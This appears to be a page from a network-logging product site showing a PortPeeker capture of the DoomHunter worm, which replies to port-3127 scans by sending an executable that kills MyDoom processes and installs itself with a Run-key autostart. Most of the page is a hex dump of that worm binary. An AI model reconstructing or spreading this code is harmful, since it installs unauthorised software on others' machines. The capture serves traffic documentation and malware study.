Link Logger Home ZyXel Banner Binary Visions
Netgear
LinkSYS
Router

DoomHunter
Link Logger for Windows
Home Home Product Info Product Info Download Download/Purchase Support Support  
Link Logger for Windows

NewsLatest News

Screen ShotsScreenshots

Customer CommentsFeedback

Common ScansScans

Additional ResourcesResources

DoomHunter PortPeeker Capture

DoomHunter sends a program back in response to a scan to TCP port 3127 (ie a DoomJuice scan) and attempts to kill the infection and install itself on the infected system.

Port Peeker Capture of DoomHunter

TTCP Connection Request
--- 12/02/2004 16:12:00.240

68.234.4.113 : 3593 TCP Connected ID = 5
--- 12/02/2004 16:12:00.330
Status Code: 0 OK

68.234.4.113 : 3593 TCP Data In Length 2920 bytes : MD5 = 4BC8611C0CCE43587385D8421E8B5E04
--- 12/02/2004 16:12:00.430
0000 85 13 3C 9E A2 4D 5A 90 00 03 00 00 00 04 00 00 ..<..MZ.........
0010 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 .............@..
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0040 00 D8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 .............!..
0050 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 L.!This program
0060 63 61 6E 6E 6F 74 20 62 65 20 72 75 6E 20 69 6E cannot be run in
0070 20 44 4F 53 20 6D 6F 64 65 2E 0D 0D 0A 24 00 00 DOS mode....$..
0080 00 00 00 00 00 E3 51 BE AC A7 30 D0 FF A7 30 D0 ......Q...0...0.
0090 FF A7 30 D0 FF 4F 2F DA FF AC 30 D0 FF 24 2C DE ..0..O/...0..$,.
00A0 FF A6 30 D0 FF 4F 2F D4 FF A5 30 D0 FF A7 30 D1 ..0..O/...0...0.
00B0 FF 93 30 D0 FF C5 2F C3 FF AE 30 D0 FF 4F 2F DB ..0.../...0..O/.
00C0 FF A6 30 D0 FF 52 69 63 68 A7 30 D0 FF 00 00 00 ..0..Rich.0.....
00D0 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 .............PE.
00E0 00 4C 01 01 00 49 63 2A 40 00 00 00 00 00 00 00 .L...Ic*@.......
00F0 00 E0 00 0F 01 0B 01 06 00 00 12 00 00 00 00 00 ................
0100 00 00 00 00 00 B0 1A 00 00 00 10 00 00 00 30 00 ..............0.
0110 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 ...@............
0120 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 00 ..............0.
0130 00 00 02 00 00 00 00 00 00 02 00 00 00 00 00 10 ................
0140 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 ................
0150 00 10 00 00 00 00 00 00 00 00 00 00 00 68 1C 00 .............h..
0160 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .x..............
0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01B0 00 00 00 00 00 00 10 00 00 DC 00 00 00 00 00 00 ................
01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01D0 00 00 00 00 00 2E 74 65 78 74 00 00 00 4A 10 00 ......text...J..
01E0 00 00 10 00 00 00 12 00 00 00 02 00 00 00 00 00 ................
01F0 00 00 00 00 00 00 00 00 00 20 00 00 E0 00 00 00 ......... ......
0200 00 00 00 00 00 EE 1E 00 00 0E 1F 00 00 FC 1E 00 ................
0210 00 DC 1E 00 00 00 00 00 00 24 20 00 00 38 20 00 .........$ ..8 .
0220 00 90 1E 00 00 7A 1E 00 00 64 1E 00 00 C8 1D 00 .....z...d......
0230 00 D4 1D 00 00 E2 1D 00 00 F0 1D 00 00 F8 1D 00 ................
0240 00 06 1E 00 00 14 1E 00 00 28 1E 00 00 36 1E 00 .........(...6..
0250 00 48 1E 00 00 58 1E 00 00 00 00 00 00 C2 1F 00 .H...X..........
0260 00 D2 1F 00 00 E2 1F 00 00 F0 1F 00 00 A2 1F 00 ................
0270 00 92 1F 00 00 88 1F 00 00 02 20 00 00 16 20 00 .......... ... .
0280 00 2E 1F 00 00 36 1F 00 00 40 1F 00 00 4A 1F 00 .....6...@...J..
0290 00 54 1F 00 00 6A 1F 00 00 72 1F 00 00 80 1F 00 .T...j...r......
02A0 00 AE 1F 00 00 00 00 00 00 B0 1E 00 00 BE 1E 00 ................
02B0 00 00 00 00 00 73 00 00 80 02 00 00 80 0D 00 00 .....s..........
02C0 80 17 00 00 80 09 00 00 80 03 00 00 80 01 00 00 ................
02D0 80 0C 00 00 80 04 00 00 80 13 00 00 80 00 00 00 ................
02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
02F0 00 00 00 00 00 70 11 40 00 64 11 40 00 54 11 40 .....p.@.d.@.T.@
0300 00 48 11 40 00 3C 11 40 00 30 11 40 00 24 11 40 .H.@.<.@.0.@.$.@
0310 00 14 11 40 00 00 00 00 00 53 48 49 4D 47 41 50 ...@.....SHIMGAP
0320 49 2E 44 4C 4C 00 00 00 00 43 54 46 4D 4F 4E 2E I.DLL....CTFMON.
0330 44 4C 4C 00 00 52 45 47 45 44 49 54 2E 45 58 45 DLL..REGEDIT.EXE
0340 00 54 45 45 4B 49 44 53 2E 45 58 45 00 4D 53 42 .TEEKIDS.EXE.MSB
0350 4C 41 53 54 2E 45 58 45 00 45 58 50 4C 4F 52 45 LAST.EXE.EXPLORE
0360 52 2E 45 58 45 00 00 00 00 54 41 53 4B 4D 4F 4E R.EXE....TASKMON
0370 2E 45 58 45 00 49 4E 54 52 45 4E 41 54 2E 45 58 .EXE.INTRENAT.EX
0380 45 00 00 00 00 4D 79 64 6F 6F 6D 20 72 65 6D 6F E....Mydoom remo
0390 76 61 6C 20 77 6F 72 6D 20 28 44 44 4F 53 20 74 val worm (DDOS t
03A0 68 65 20 52 49 41 41 21 21 29 00 00 00 53 65 6E he RIAA!!)...Sen
03B0 64 20 74 68 69 73 20 66 69 6C 65 20 74 6F 20 65 d this file to e
03C0 76 69 6C 20 73 65 72 76 65 72 00 00 00 43 6F 6E vil server...Con
03D0 6E 65 63 74 65 64 20 74 6F 20 65 76 69 6C 20 73 nected to evil s
03E0 65 72 76 65 72 00 00 00 00 43 6F 6E 6E 65 63 74 erver....Connect
03F0 69 6F 6E 20 66 72 6F 6D 3A 20 25 73 20 74 72 79 ion from: %s try
0400 69 6E 67 20 74 6F 20 75 70 6C 6F 61 64 00 00 00 ing to upload...
0410 00 4C 69 73 74 65 6E 20 6F 6E 20 70 6F 72 74 20 .Listen on port
0420 33 31 32 37 00 44 45 4C 45 54 45 20 4D 45 00 00 3127.DELETE ME..
0430 00 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 .Software\Micros
0440 6F 66 74 5C 57 69 6E 64 6F 77 73 5C 43 75 72 72 oft\Windows\Curr
0450 65 6E 74 56 65 72 73 69 6F 6E 5C 52 75 6E 00 00 entVersion\Run..
0460 00 43 72 65 61 74 69 6E 67 20 61 75 74 6F 73 74 .Creating autost
0470 61 72 74 20 6B 65 79 00 00 25 73 5C 25 73 00 00 art key..%s\%s..
0480 00 44 65 6C 65 74 69 6E 67 20 65 76 69 6C 20 70 .Deleting evil p
0490 72 6F 67 73 00 54 72 79 69 6E 67 20 74 6F 20 6B rogs.Trying to k
04A0 69 6C 6C 20 65 76 69 6C 20 70 72 6F 63 65 73 73 ill evil process
04B0 65 73 20 22 54 68 69 73 20 77 69 6C 6C 20 6B 69 es "This will ki
04C0 6C 6C 20 65 78 70 6C 6F 72 65 72 20 74 6F 20 73 ll explorer to s
04D0 6F 72 72 79 20 66 6F 72 20 74 68 61 74 22 00 00 orry for that"..
04E0 00 50 72 6F 63 65 73 73 33 32 4E 65 78 74 00 00 .Process32Next..
04F0 00 50 72 6F 63 65 73 73 33 32 46 69 72 73 74 00 .Process32First.
0500 00 43 72 65 61 74 65 54 6F 6F 6C 68 65 6C 70 33 .CreateToolhelp3
0510 32 53 6E 61 70 73 68 6F 74 00 00 00 00 6B 65 72 2Snapshot....ker
0520 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00 69 6E 73 nel32.dll....ins
0530 74 61 6C 6C 69 6E 67 20 77 6F 72 6D 00 44 65 6C talling worm.Del
0540 65 74 65 64 20 64 6C 6C 20 61 75 74 6F 6C 6F 61 eted dll autoloa
0550 64 20 6B 65 79 00 00 00 00 28 44 65 66 61 75 6C d key....(Defaul
0560 74 29 00 00 00 43 4C 53 49 44 5C 7B 45 36 46 42 t)...CLSID\{E6FB
0570 35 45 32 30 2D 44 45 33 35 2D 31 31 43 46 2D 39 5E20-DE35-11CF-9
0580 43 38 37 2D 30 30 41 41 30 30 35 31 32 37 45 44 C87-00AA005127ED
0590 7D 5C 49 6E 50 72 6F 63 53 65 72 76 65 72 33 32 }\InProcServer32
05A0 00 5C 77 6F 72 6D 2E 65 78 65 00 00 00 69 20 68 .\worm.exe...i h
05B0 61 76 65 20 6E 6F 20 69 64 65 65 20 69 66 20 74 ave no idee if t
05C0 68 69 73 20 77 6F 72 6B 73 20 62 75 74 20 69 20 his works but i
05D0 74 72 79 20 69 74 20 61 6E 79 77 61 79 00 00 00 try it anyway...
05E0 00 48 65 6C 6C 6F 20 69 6D 20 74 68 65 20 6D 79 .Hello im the my
05F0 64 6F 6F 6D 20 72 65 6D 6F 76 61 6C 20 77 6F 72 doom removal wor
0600 6D 20 74 6F 20 6B 69 6C 6C 20 6D 65 20 67 6F 20 m to kill me go
0610 74 6F 20 22 48 4B 45 59 5F 43 55 52 52 45 4E 54 to "HKEY_CURRENT
0620 5F 55 53 45 52 5C 53 6F 66 74 77 61 72 65 5C 4D _USER\Software\M
0630 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 icrosoft\Windows
0640 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C \CurrentVersion\
0650 52 75 6E 22 20 61 6E 64 20 72 65 6D 6F 76 65 20 Run" and remove
0660 74 68 65 20 22 44 45 4C 45 54 45 20 4D 45 22 20 the "DELETE ME"
0670 76 61 6C 75 65 20 61 6E 64 20 72 65 62 6F 6F 74 value and reboot
0680 00 44 45 42 55 47 00 00 00 01 00 00 00 00 00 00 .DEBUG..........
0690 00 00 00 00 00 77 6F 72 6D 2E 65 78 65 00 00 00 .....worm.exe...
06A0 00 00 00 00 00 FF FF FF FF EE 1B 40 00 02 1C 40 ...........@...@
06B0 00 00 00 00 00 A1 48 1C 40 00 85 C0 74 14 8B 44 ......H.@...t..D
06C0 24 04 6A 00 68 80 11 40 00 50 6A 00 FF 15 A4 10 $.j.h..@.Pj.....
06D0 40 00 C3 90 90 81 EC F8 05 00 00 53 55 56 57 FF @..........SUVW.
06E0 15 1C 10 40 00 33 DB 3B C3 74 34 68 7C 14 40 00 ...@.3.;.t4h|.@.
06F0 50 FF 15 8C 10 40 00 83 C4 08 85 C0 74 21 68 DC P....@......t!h.
0700 13 40 00 C7 05 48 1C 40 00 01 00 00 00 E8 A3 FF .@...H.@........
0710 FF FF 68 A8 13 40 00 E8 99 FF FF FF 83 C4 08 8D ..h..@..........
0720 84 24 70 02 00 00 68 04 01 00 00 50 53 FF 15 20 .$p...h....PS..
0730 10 40 00 8B 2D 24 10 40 00 8D 4C 24 44 68 04 01 .@..-$.@..L$Dh..
0740 00 00 51 FF D5 BF 9C 13 40 00 83 C9 FF 33 C0 8D ..Q.....@....3..
0750 54 24 44 F2 AE F7 D1 2B F9 8B F7 8B FA 8B D1 83 T$D....+........
0760 C9 FF F2 AE 8B CA 4F C1 E9 02 F3 A5 8B CA 83 E1 ......O.........
0770 03 F3 A4 8D 7C 24 44 83 C9 FF F2 AE 8B 35 A8 10 ....|$D......5..
0780 40 00 8D 44 24 44 F7 D1 49 51 50 FF D6 8D BC 24 @..D$D..IQP....$
0790 70 02 00 00 83 C9 FF 33 C0 F2 AE F7 D1 49 51 8D p......3.....IQ.
07A0 8C 24 74 02 00 00 51 FF D6 8D 54 24 14 53 52 53 .$t...Q...T$.SRS
07B0 68 3F 00 0F 00 53 53 53 68 60 13 40 00 68 00 00 h?...SSSh`.@.h..
07C0 00 80 FF 15 04 10 40 00 68 54 13 40 00 8B 44 24 ......@.hT.@..D$
07D0 18 50 FF 15 08 10 40 00 68 38 13 40 00 E8 D3 FE .P....@.h8.@....
07E0 FF FF 8B 4C 24 18 83 C4 04 51 FF 15 00 10 40 00 ...L$....Q....@.
07F0 8D 74 24 44 8D 84 24 70 02 00 00 8A 10 8A CA 3A .t$D..$p.......:
0800 16 75 1C 84 C9 74 14 8A 50 01 8A CA 3A 56 01 75 .u...t..P...:V.u
0810 0E 83 C0 02 83 C6 02 84 C9 75 E0 33 C0 EB 05 1B .........u.3....
0820 C0 83 D8 FF 3B C3 0F 84 C5 01 00 00 68 28 13 40 ....;.......h(.@
0830 00 E8 7F FE FF FF 83 C4 04 8D 44 24 44 8D 8C 24 .........D$D..$
0840 70 02 00 00 6A 01 50 51 FF 15 50 10 40 00 68 18 p...j.PQ..P.@.h.
0850 13 40 00 FF 15 4C 10 40 00 8B F0 3B F3 74 2D 8B .@...L.@...;.t-.
0860 3D 48 10 40 00 68 FC 12 40 00 56 FF D7 68 EC 12 =H.@.h..@.V..h..
0870 40 00 56 A3 44 1C 40 00 FF D7 68 DC 12 40 00 56 @.V.D.@...h..@.V
0880 A3 40 1C 40 00 FF D7 A3 3C 1C 40 00 8D 54 24 44 .@.@....<.@..T$D
0890 68 04 01 00 00 52 FF D5 B9 49 00 00 00 33 C0 8D h....R...I...3..
08A0 BC 24 4C 01 00 00 89 9C 24 48 01 00 00 F3 AB 68 .$L.....$H.....h
08B0 90 12 40 00 E8 FC FD FF FF 83 C4 04 53 6A 02 FF ..@.........Sj..
08C0 15 44 1C 40 00 8B F0 83 FE FF 0F 84 C7 00 00 00 .D.@............
08D0 8D 84 24 48 01 00 00 C7 84 24 48 01 00 00 28 01 ..$H.....$H...(.
08E0 00 00 50 56 FF 15 40 1C 40 00 85 C0 0F 84 A5 00 ..PV..@.@.......
08F0 00 00 8B 2D 44 10 40 00 8B 1D 40 10 40 00 8D BC ...-D.@...@.@...
0900 24 6C 01 00 00 83 C9 FF 33 C0 F2 AE F7 D1 49 51 $l......3.....IQ
0910 8D 8C 24 70 01 00 00 51 FF 15 A8 10 40 00 8B 0D ..$p...Q....@...
0920 F0 10 40 00 33 C0 85 C9 89 44 24 10 74 49 8B 14 ..@.3....D$.tI..
0930 85 F0 10 40 00 8D 84 24 6C 01 00 00 52 50 FF 15 ...@...$l...RP..
0940 8C 10 40 00 83 C4 08 85 C0 75 16 8B 44 24 10 40 ..@......u..D$.@
0950 89 44 24 10 8B 0C 85 F0 10 40 00 85 C9 75 CF EB .D$......@...u..
0960 16 8B 8C 24 50 01 00 00 51 6A 00 68 FF 0F 1F 00 ...$P...Qj.h....
0970 FF D5 6A 00 50 FF D3 8D 94 24 48 01 00 00 52 56 ..j.P....$H...RV
0980 FF 15 3C 1C 40 00 85 C0 0F 85 70 FF FF FF 56 FF ..<.@.....p...V.
0990 15 3C 10 40 00 33 DB 68 7C 12 40 00 E8 14 FD FF .<.@.3.h|.@.....
09A0 FF A1 F0 10 40 00 83 C4 04 3B C3 89 5C 24 10 74 ....@....;..\$.t
09B0 40 8B 35 38 10 40 00 50 8D 44 24 48 50 8D 8C 24 @.58.@.P.D$HP..$
09C0 7C 03 00 00 68 74 12 40 00 51 FF 15 88 10 40 00 |...ht.@.Q....@.
09D0 83 C4 10 8D 94 24 74 03 00 00 52 FF D6 8B 44 24 .....$t...R...D$
09E0 10 40 89 44 24 10 8B 04 85 F0 10 40 00 3B C3 75 .@.D$......@.;.u
09F0 C6 68 5C 12 40 00 E8 BA FC FF FF 83 C4 04 8D 44 .h\.@..........D
0A00 24 14 53 50 53 68 3F 00 0F 00 53 53 53 68 2C 12 $.SPSh?...SSSh,.
0A10 40 00 68 01 00 00 80 FF 15 04 10 40 00 6A 0A 68 @.h........@.j.h
0A20 90 14 40 00 8B 4C 24 1C 6A 01 53 68 20 12 40 00 ..@..L$.j.Sh .@.
0A30 51 FF 15 0C 10 40 00 8B 54 24 14 52 FF 15 00 10 Q....@..T$.R....
0A40 40 00 8D 84 24 78 04 00 00 50 68 02 02 00 00 FF @...$x...Ph.....
0A50 15 B0 10 40 00 85 C0 0F 85 47 02 00 00 8B 3D B4 ...@.....G....=.
0A60 10 40 00 8B 2D B8 10 40 00 53 6A 01 6A 02 FF 15 .@..-..@.Sj.j...
0A70 BC 10 40 00 8B F0 83 FE FF 89 74 24 28 74 54 33 ..@.......t$(tT3
0A80 C9 68 37 0C 00 00 89 4C 24 1C 66 C7 44 24 1C 02 .h7....L$.f.D$..
0A90 00 89 4C 24 20 89 4C 24 24 89 4C 24 28 FF 15 C0 ..L$ .L$$.L$(...
0AA0 10 40 00 8D 54 24 18 6A 10 52 56 66 89 44 24 26 .@..T$.j.RVf.D$&
0AB0 89 5C 24 28 FF D7 85 C0 75 0C 68 FF FF FF 7F 56 .\$(....u.h...V
0AC0 FF D5 85 C0 74 1D 68 88 13 00 00 FF 15 34 10 40 ....t.h......4.@
0AD0 00 EB 96 5F 5E 5D 83 C8 FF 5B 81 C4 F8 05 00 00 ..._^]...[......
0AE0 C2 10 00 68 0C 12 40 00 E8 C8 FB FF FF 8B 1D C4 ...h..@.........
0AF0 10 40 00 83 C4 04 EB 04 8B 74 24 28 8D 44 24 10 .@.......t$(.D$.
0B00 8D 4C 24 34 50 51 56 C7 44 24 1C 10 00 00 00 FF .L$4PQV.D$......
0B10 15 C8 10 40 00 8B E8 83 FD FF 74 E0 8B 44 24 38 ...@......t..D$8
0B20 50 89 44 24 30 FF 15 CC 10 40 00 8B F8 83 C9 FF P.D$0....@......
0B30 33 C0 8D 54 24 44 F2 AE F7 D1 2B F9 8B C1 8B F7 3..T$D....+.....
0B40 8B FA 8D 94 24 74 03 00 00 C1 E9 02 F3 A5 8B C8 ....$t..........
0B50 83 E1 03 F3 A4 8D 4C 24 44 51 68 E4 11 40 00 52 ......L$DQh..@.R
0B60 FF 15 88 10 40 00 8D 84 ....@...


68.234.4.113 : 3593 TCP Data In Length 2205 bytes : MD5 = C4F635640ACD9EBFBE741B66B28022EE
--- 12/02/2004 16:12:05.788
0000 24 80 03 00 00 50 E8 42 FB FF FF 83 C4 10 55 FF $....P.B......U.
0010 D3 6A 00 6A 01 6A 02 FF 15 BC 10 40 00 8B E8 83 .j.j.j.....@....
0020 FD FF 0F 84 14 01 00 00 33 C9 68 37 0C 00 00 89 ........3.h7....
0030 4C 24 1C 66 C7 44 24 1C 02 00 89 4C 24 20 89 4C L$.f.D$....L$ .L
0040 24 24 89 4C 24 28 FF 15 C0 10 40 00 6A 10 8B 54 $$.L$(....@.j..T
0050 24 30 66 89 44 24 1E 8D 44 24 1C 89 54 24 20 50 $0f.D$..D$..T$ P
0060 55 FF 15 D0 10 40 00 83 F8 FF 0F 84 20 FF FF FF U....@...... ...
0070 68 C8 11 40 00 E8 D3 FA FF FF 83 C4 04 8D 8C 24 h..@...........$
0080 70 02 00 00 6A 00 6A 00 6A 03 6A 00 6A 01 68 00 p...j.j.j.j.j.h.
0090 00 00 80 51 FF 15 30 10 40 00 8B F8 83 FF FF 0F ...Q..0.@.......
00A0 84 EB FE FF FF 6A 00 57 FF 15 2C 10 40 00 89 44 .....j.W..,.@..D
00B0 24 10 83 C0 05 50 FF 15 84 10 40 00 8B F0 83 C4 $....P....@.....
00C0 04 8D 54 24 30 C6 06 85 C6 46 01 13 C6 46 02 3C ..T$0....F...F.<
00D0 C6 46 03 9E C6 46 04 A2 8B 44 24 10 6A 00 52 8D .F...F...D$.j.R.
00E0 4E 05 50 51 57 FF 15 28 10 40 00 6A 32 8D 54 24 N.PQW..(.@.j2.T$
00F0 48 56 52 FF 15 80 10 40 00 8B 44 24 1C 83 C4 0C HVR....@..D$....
0100 83 C0 05 6A 00 50 56 55 FF 15 D4 10 40 00 68 A8 ...j.PVU....@.h.
0110 11 40 00 E8 35 FA FF FF 56 FF 15 7C 10 40 00 83 .@..5...V..|.@..
0120 C4 08 57 FF 15 3C 10 40 00 68 E8 03 00 00 FF 15 ..W..<.@.h......
0130 34 10 40 00 55 FF D3 E9 54 FE FF FF 5F 5E 5D 33 4.@.U...T..._^]3
0140 C0 5B 81 C4 F8 05 00 00 C2 10 00 90 90 55 8B EC .[...........U..
0150 6A FF 68 A0 14 40 00 68 30 1C 40 00 64 A1 00 00 j.h..@.h0.@.d...
0160 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 ..Pd.%......hSVW
0170 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 64 10 40 00 .e.3..].j...d.@.
0180 59 83 0D 5C 1C 40 00 FF 83 0D 60 1C 40 00 FF FF Y..\.@....`.@...
0190 15 60 10 40 00 8B 0D 58 1C 40 00 89 08 FF 15 5C .`.@...X.@.....\
01A0 10 40 00 8B 0D 54 1C 40 00 89 08 A1 58 10 40 00 .@...T.@....X.@.
01B0 8B 00 A3 64 1C 40 00 E8 10 01 00 00 39 1D 84 14 ...d.@......9...
01C0 40 00 75 0C 68 2C 1C 40 00 FF 15 9C 10 40 00 59 @.u.h,.@.....@.Y
01D0 E8 E2 00 00 00 68 E8 10 40 00 68 E4 10 40 00 E8 .....h..@.h..@..
01E0 CD 00 00 00 A1 50 1C 40 00 89 45 94 8D 45 94 50 .....P.@..E..E.P
01F0 FF 35 4C 1C 40 00 8D 45 9C 50 8D 45 90 50 8D 45 .5L.@..E.P.E.P.E
0200 A0 50 FF 15 6C 10 40 00 68 E0 10 40 00 68 DC 10 .P..l.@.h..@.h..
0210 40 00 E8 9A 00 00 00 83 C4 24 A1 70 10 40 00 8B @........$.p.@..
0220 30 89 75 8C 80 3E 22 75 3A 46 89 75 8C 8A 06 3A 0.u..>"u:F.u...:
0230 C3 74 04 3C 22 75 F2 80 3E 22 75 04 46 89 75 8C .t.<"u..>"u.F.u.
0240 8A 06 3A C3 74 04 3C 20 76 F2 89 5D D0 8D 45 A4 ..:.t.< v..]..E.
0250 50 FF 15 18 10 40 00 F6 45 D0 01 74 11 0F B7 45 P....@..E..t...E
0260 D4 EB 0E 80 3E 20 76 D8 46 89 75 8C EB F5 6A 0A ....> v.F.u...j.
0270 58 50 56 53 53 FF 15 14 10 40 00 50 E8 EC F8 FF XPVSS....@.P....
0280 FF 89 45 98 50 FF 15 98 10 40 00 8B 45 EC 8B 08 ..E.P....@..E...
0290 8B 09 89 4D 88 50 51 E8 0F 00 00 00 59 59 C3 8B ...M.PQ.....YY..
02A0 65 E8 FF 75 88 FF 15 90 10 40 00 FF 25 94 10 40 e..u.....@..%..@
02B0 00 FF 25 68 10 40 00 68 00 00 03 00 68 00 00 01 ..%h.@.h....h...
02C0 00 E8 0D 00 00 00 59 59 C3 33 C0 C3 C3 FF 25 74 ......YY.3....%t
02D0 10 40 00 FF 25 78 10 40 00 00 00 00 00 00 00 00 .@..%x.@........
02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0300 00 00 00 00 00 90 1D 00 00 00 00 00 00 00 00 00 ................
0310 00 BC 1D 00 00 B0 10 00 00 F4 1C 00 00 00 00 00 ................
0320 00 00 00 00 00 A2 1E 00 00 14 10 00 00 84 1D 00 ................
0330 00 00 00 00 00 00 00 00 00 D0 1E 00 00 A4 10 00 ................
0340 00 E0 1C 00 00 00 00 00 00 00 00 00 00 20 1F 00 ............. ..
0350 00 00 10 00 00 38 1D 00 00 00 00 00 00 00 00 00 .....8..........
0360 00 5E 1F 00 00 58 10 00 00 00 00 00 00 00 00 00 .^...X..........
0370 00 00 00 00 00 00 00 00 00 00 00 00 00 EE 1E 00 ................
0380 00 0E 1F 00 00 FC 1E 00 00 DC 1E 00 00 00 00 00 ................
0390 00 24 20 00 00 38 20 00 00 90 1E 00 00 7A 1E 00 .$ ..8 ......z..
03A0 00 64 1E 00 00 C8 1D 00 00 D4 1D 00 00 E2 1D 00 .d..............
03B0 00 F0 1D 00 00 F8 1D 00 00 06 1E 00 00 14 1E 00 ................
03C0 00 28 1E 00 00 36 1E 00 00 48 1E 00 00 58 1E 00 .(...6...H...X..
03D0 00 00 00 00 00 C2 1F 00 00 D2 1F 00 00 E2 1F 00 ................
03E0 00 F0 1F 00 00 A2 1F 00 00 92 1F 00 00 88 1F 00 ................
03F0 00 02 20 00 00 16 20 00 00 2E 1F 00 00 36 1F 00 .. ... ......6..
0400 00 40 1F 00 00 4A 1F 00 00 54 1F 00 00 6A 1F 00 .@...J...T...j..
0410 00 72 1F 00 00 80 1F 00 00 AE 1F 00 00 00 00 00 .r..............
0420 00 B0 1E 00 00 BE 1E 00 00 00 00 00 00 73 00 00 .............s..
0430 80 02 00 00 80 0D 00 00 80 17 00 00 80 09 00 00 ................
0440 80 03 00 00 80 01 00 00 80 0C 00 00 80 04 00 00 ................
0450 80 13 00 00 80 00 00 00 00 57 53 32 5F 33 32 2E .........WS2_32.
0460 64 6C 6C 00 00 18 02 52 65 61 64 46 69 6C 65 00 dll....ReadFile.
0470 00 12 01 47 65 74 46 69 6C 65 53 69 7A 65 00 34 ...GetFileSize.4
0480 00 43 72 65 61 74 65 46 69 6C 65 41 00 96 02 53 .CreateFileA...S
0490 6C 65 65 70 00 57 00 44 65 6C 65 74 65 46 69 6C leep.W.DeleteFil
04A0 65 41 00 1B 00 43 6C 6F 73 65 48 61 6E 64 6C 65 eA...CloseHandle
04B0 00 9E 02 54 65 72 6D 69 6E 61 74 65 50 72 6F 63 ...TerminateProc
04C0 65 73 73 00 00 EF 01 4F 70 65 6E 50 72 6F 63 65 ess....OpenProce
04D0 73 73 00 3E 01 47 65 74 50 72 6F 63 41 64 64 72 ss.>.GetProcAddr
04E0 65 73 73 00 00 C2 01 4C 6F 61 64 4C 69 62 72 61 ess....LoadLibra
04F0 72 79 41 00 00 28 00 43 6F 70 79 46 69 6C 65 41 ryA..(.CopyFileA
0500 00 59 01 47 65 74 53 79 73 74 65 6D 44 69 72 65 .Y.GetSystemDire
0510 63 74 6F 72 79 41 00 24 01 47 65 74 4D 6F 64 75 ctoryA.$.GetModu
0520 6C 65 46 69 6C 65 4E 61 6D 65 41 00 00 CA 00 47 leFileNameA....G
0530 65 74 43 6F 6D 6D 61 6E 64 4C 69 6E 65 41 00 4B etCommandLineA.K
0540 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 BE 01 4D ERNEL32.dll....M
0550 65 73 73 61 67 65 42 6F 78 41 00 30 00 43 68 61 essageBoxA.0.Cha
0560 72 55 70 70 65 72 42 75 66 66 41 00 00 55 53 45 rUpperBuffA..USE
0570 52 33 32 2E 64 6C 6C 00 00 86 01 52 65 67 53 65 R32.dll....RegSe
0580 74 56 61 6C 75 65 45 78 41 00 00 5B 01 52 65 67 tValueExA..[.Reg
0590 43 6C 6F 73 65 4B 65 79 00 64 01 52 65 67 44 65 CloseKey.d.RegDe
05A0 6C 65 74 65 56 61 6C 75 65 41 00 5F 01 52 65 67 leteValueA._.Reg
05B0 43 72 65 61 74 65 4B 65 79 45 78 41 00 41 44 56 CreateKeyExA.ADV
05C0 41 50 49 33 32 2E 64 6C 6C 00 00 5E 02 66 72 65 API32.dll..^.fre
05D0 65 00 00 C1 02 73 74 72 6E 63 70 79 00 91 02 6D e....strncpy...m
05E0 61 6C 6C 6F 63 00 00 B2 02 73 70 72 69 6E 74 66 alloc....sprintf
05F0 00 C5 02 73 74 72 73 74 72 00 00 4D 53 56 43 52 ...strstr..MSVCR
0600 54 2E 64 6C 6C 00 00 D3 00 5F 65 78 69 74 00 48 T.dll...._exit.H
0610 00 5F 58 63 70 74 46 69 6C 74 65 72 00 49 02 65 ._XcptFilter.I.e
0620 78 69 74 00 00 8F 00 5F 61 63 6D 64 6C 6E 00 58 xit...._acmdln.X
0630 00 5F 5F 67 65 74 6D 61 69 6E 61 72 67 73 00 0F .__getmainargs..
0640 01 5F 69 6E 69 74 74 65 72 6D 00 83 00 5F 5F 73 ._initterm...__s
0650 65 74 75 73 65 72 6D 61 74 68 65 72 72 00 00 9D etusermatherr...
0660 00 5F 61 64 6A 75 73 74 5F 66 64 69 76 00 00 6A ._adjust_fdiv..j
0670 00 5F 5F 70 5F 5F 63 6F 6D 6D 6F 64 65 00 00 6F .__p__commode..o
0680 00 5F 5F 70 5F 5F 66 6D 6F 64 65 00 00 81 00 5F .__p__fmode...._
0690 5F 73 65 74 5F 61 70 70 5F 74 79 70 65 00 00 CA _set_app_type...
06A0 00 5F 65 78 63 65 70 74 5F 68 61 6E 64 6C 65 72 ._except_handler
06B0 33 00 00 B7 00 5F 63 6F 6E 74 72 6F 6C 66 70 00 3...._controlfp.
06C0 00 26 01 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 .&.GetModuleHand
06D0 6C 65 41 00 00 50 01 47 65 74 53 74 61 72 74 75 leA..P.GetStartu
06E0 70 49 6E 66 6F 41 00 00 00 00 00 00 00 00 00 00 pInfoA..........
06F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0700 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0710 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0720 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0730 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
